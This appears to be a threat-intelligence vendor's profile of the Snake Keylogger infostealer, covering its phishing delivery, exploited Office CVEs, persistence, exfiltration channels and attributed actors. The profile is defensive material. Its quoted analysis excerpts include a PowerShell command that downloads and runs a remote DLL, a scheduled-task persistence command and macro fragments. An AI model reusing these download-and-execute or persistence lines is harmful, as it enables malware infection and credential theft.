Snake Keylogger, also known as 404 Keylogger and KrakenKeylogger, is a modular .NET information-stealing malware family targeting Microsoft Windows. First observed in late 2020, it has been sold through subscription-based access on underground forums and is used by multiple operators. Its capabilities include keystroke logging, screenshot capture, clipboard collection, and theft of saved credentials from browsers, email clients, FTP clients, and messaging applications. Some variants harvest credentials from more than 50 applications. It also collects host and geographic information. Features are configurable, and individual variants may enable credential theft without activating other surveillance functions.
Snake Keylogger is distributed through phishing and spearphishing campaigns using payment, invoice, procurement, and other business-themed lures. Observed delivery formats include malicious Excel documents, archive attachments, disk images, and PDFs that embed or link to malicious Office documents. Infection chains use VBA macros or exploit Office vulnerabilities, including CVE-2017-0199 and CVE-2017-11882, to retrieve and execute subsequent stages. RelicRace, RelicSource, and QuirkyLoader have been used to deliver the family. CERT-UA tracks a large-scale phishing operation distributing Snake Keylogger and Formbook as UAC-0041. Other campaigns have targeted industrial organizations and international energy, oil and gas, and electronics companies, including South Korean firms.
Observed deployment chains use encrypted resources, multilayer obfuscation, in-memory assembly loading, and process hollowing. Persistence mechanisms include scheduled tasks and modification of Windows Startup folder settings. Anti-analysis behavior includes execution delays and checks that suppress exfiltration on selected analysis systems. Stolen information is transmitted through SMTP email, FTP, or the Telegram Bot API, depending on the variant and configuration.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The Excel file contains a specially crafted embedded link object that exploits CVE-2017-0199 to download a malicious file. Opening the document triggers retrieval of an HTA file, which initiates the Snake Keylogger delivery chain. | Fortinet’s FortiGuard Labs recently caught a phishing campaign in the wild with a malicious Excel document attached to the phishing email. We performed a deep analysis on the campaign and discovered that it delivers a new variant of Snake Keylogger.
Examining the OLE object reveals shellcode that exploits the CVE-2017-11882 remote code execution vulnerability in Equation Editor. | The executable is Snake Keylogger, a family of information-stealing malware that we have written about before.
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Payloads of early versions of the ransomware from June 2021 ... could either be TargetComp ransomware, the Remcos backdoor, the Negasteal malware, or the Snake Keylogger malware.
Як пейлоад використовуються програми-стілери, а саме: Formbook та Snake Keylogger (ексфільтрація за допомогою API Telegram).
Overview Snake Keylogger, also known as 404 Keylogger, is malware that has been categorized as a keylogger and that has evolved over time, acquiring stealer capabilities that complement its functions and have made it more powerful over the years.
... TA2715 and TA2536, both of which favored Snake Keylogger ...
... TA2715 and TA2536, both of which favored Snake Keylogger ...
“The S2 Group’s intelligence team has identified… a new phishing campaign by Snake Keylogger, a Russian origin stealer programmed in .NET… The campaign… using spearphishing emails offering oil products… [and] the Sideloading Dll technique to load Snake Keylogger…”
29 distinct techniques documented for this family, organized by ATT&CK tactic.
The campaign spreads via phishing emails tailored to employees at each company being targeted.
You can see that the script implements persistence through a scheduled task... chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr ...',0);
cmd = "C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create(' hxxps://www[.]mediafire[.]com/file/w2uuz1cy4cl2gup/7.dll/file ').GetResponse().GetResponseStream()).ReadToend());";
The stream ID 30 looks the most interesting. It contains indeed a macro... Sub Auto_Open()
Open koaksdokasd For Output As #1... Print #1, "function ..." ... Create ("wscript C:\Users\Public\update.js")
HP’s analysts found that it attempts to abuse an old Microsoft Equation Editor vulnerability to run arbitrary code. The deployed shellcode exploits CVE-2017-11882, a remote code execution bug in Equation Editor fixed in November 2017
The relationship that caught our eye shows an external object linking and embedding (OLE) object being loaded from this URL. | If we return to our PDF document and click on “Open this file” at the prompt, Microsoft Word opens.
Because the threat actors named the embedded document "has been verified," the Open File prompt below states, "The file 'has been verified." This message could trick recipients into believing that Adobe verified the file as legitimate and that the file is safe to open.
You can see that the script implements persistence through a scheduled task... chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr ...',0);
This variant of Snake Keylogger changes both the values of “Startup” to other folders... The program copies the Snake Keylogger file ... into this folder and renames it as “sgosr.exe”. This ensures that Snake Keylogger will be started by the Windows system every time it starts.
You can see that the script implements persistence through a scheduled task... chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr ...',0);
The program then creates a suspended child process and deploys the compressed Snake Keylogger payload into the child process... It next calls SetThreadContext() to make the child process point to the entry point function of Snake Keylogger.
This variant of Snake Keylogger changes both the values of “Startup” to other folders... The program copies the Snake Keylogger file ... into this folder and renames it as “sgosr.exe”. This ensures that Snake Keylogger will be started by the Windows system every time it starts.
The PDF is obfuscated in a classic way, all objects are embedded in an Object Stream... No need to deobfuscate the macro completely, we see interesting strings... It is a PowerShell script with some Base64 content.
var pit = king.CopyFile ("C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe", kiii); ... megamon = "C:\ProgramData\milon.com"; var pit = dihearter.CopyFile ("C:\Windows\System32\mshta.exe", megamon);
The program then creates a suspended child process and deploys the compressed Snake Keylogger payload into the child process... It next calls SetThreadContext() to make the child process point to the entry point function of Snake Keylogger.
it downloads Snake Keylogger module ... which is a RC4 encrypted DLL file. Next, it calls “ToRc()” function to RC4 decrypt it using a decryption key "Dllzjn".
In Windows 8 and Windows 10, simply double-clicking on virtual disk files will automatically mount its content. This feature is appealing for threat actors because it takes a small number of user clicks to execute the malware.
The dropped malware is generally able to steal private information, log keyboard strokes and steal browsing data.
The first analysis reports it as a Snake keylogger... "credentials": ... ftp ... The malware seems active based on the collected data that I found... 'Passwords ID' files
chuchukukukaokiwDasidow.Run("taskkill /f /im WinWord.exe",0); ... Excel.exe ... POWERPNT.exe
Snake Keylogger collects basic information regarding the victim’s Windows system, like User name, PC name, System Date and Time, Public IP address, and Country
If the key is not found, the client sends a 'sendplugin' command to the C2 server ... The C2 server then responds with the command 'savePlugin' along with a base64 encoded string containing the plugin | We observed XWorm RAT Operators execute additional malware, such as: DarkCloud Stealer ... Remcos RAT
236 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
62 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Keylogger malware family listed among the payloads supported by Cruciferra.
Keylogger mentioned in comparative tables of infection vectors, targeted industries, IOCs, and exfiltration channels, but not profiled as a main focus.
Keylogger malware distributed via Cruciferra.
Credential-stealing keylogger delivered as a final payload by the TTF Trap campaign; the 'Best Private LOGGER' variant matches Snake Keylogger collection code.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.